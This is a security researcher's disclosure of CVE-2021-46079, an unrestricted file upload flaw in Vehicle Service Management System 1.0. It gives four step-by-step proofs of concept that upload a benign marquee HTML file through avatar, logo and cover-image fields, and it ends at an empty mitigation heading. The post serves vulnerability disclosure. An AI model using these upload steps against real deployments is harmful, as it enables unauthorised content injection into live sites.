Vehicle Service Management System – ‘Multiple’ File upload Leads to Html Injection
December 29, 2021
CVE, Vulnerability, Web Penetration Testing
Cyber Security Engineer
Information Security Analyst
Security Researcher
Full Stack Developer
Cyber Security Engineer
Information Security Analyst
Security Researcher
Full Stack Developer
Exploit Title: Vehicle Service Management System – ‘Multiple’ File upload Leads to Html Injection
Exploit Author: P.L.Sanu
CVE: CVE-2021-46079
CVSS: 7.2 HIGH
References:
https://www.plsanu.com/vehicle-service-management-system-multiple-file-upload-leads-to-html-injection
https://nvd.nist.gov/vuln/detail/CVE-2021-46079
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46079
Description:
An Unrestricted File Upload vulnerability exists in Sourcecodester Vehicle Service Management System 1.0. A remote attacker can upload malicious files leading to Html Injection.
Exploit:
1. Login to the admin panel http://localhost/vehicle_service/admin
2. Navigate to My Account section http://localhost/vehicle_service/admin/?page=user
<!DOCTYPE html>
<html>
<head>
<title>HTML marquee Tag</title>
</head>
<body>
<marquee>HTML INJECTION</marquee>
</body>
</html>
3. Save the above html code For Ex:Html Injection.html
4. In My Account Section enter all the required details and browse the html file in Avatar.
5. Click on update button.
6. Open the avatar image in new tab.
7. Html Injection is Executed.
Exploit:
1. Login to the admin panel http://localhost/vehicle_service/admin
2. Navigate to User List section and click on Create New button.
<!DOCTYPE html>
<html>
<head>
<title>HTML marquee Tag</title>
</head>
<body>
<marquee>HTML INJECTION</marquee>
</body>
</html>
3. Save the above html code For Ex:Html Injection.html
4. In Create New User Page enter all the required details and browse the html file in Avatar.
5. Click on Save button.
6. Open the avatar image in new tab.
7. Html Injection is Executed.
Exploit:
1. Login to the admin panel http://localhost/vehicle_service/admin
2. Navigate to Settings section http://localhost/vehicle_service/admin/?page=system_info
<!DOCTYPE html>
<html>
<head>
<title>HTML marquee Tag</title>
</head>
<body>
<marquee>HTML INJECTION</marquee>
</body>
</html>
3. Save the above html code For Ex:Html Injection.html
4. In Settings Section enter all the required details and browse the html file in System Logo.
5. Click on update button.
6. Open the System Logo image in new tab.
7. Html Injection is Executed.
Exploit:
1. Login to the admin panel http://localhost/vehicle_service/admin
2. Navigate to Settings section http://localhost/vehicle_service/admin/?page=system_info
<!DOCTYPE html>
<html>
<head>
<title>HTML marquee Tag</title>
</head>
<body>
<marquee>HTML INJECTION</marquee>
</body>
</html>
3. Save the above html code For Ex:Html Injection.html
4. In Settings Section enter all the required details and browse the html file in Website Cover.
5. Click on update button.
6. Open the Website Cover image in new tab.
7. Html Injection is Executed.
Impact:
An attacker can able to upload malicious file in multiple endpoints it leads to Html Injection.
Mitigation:
It is recommended to implement the following: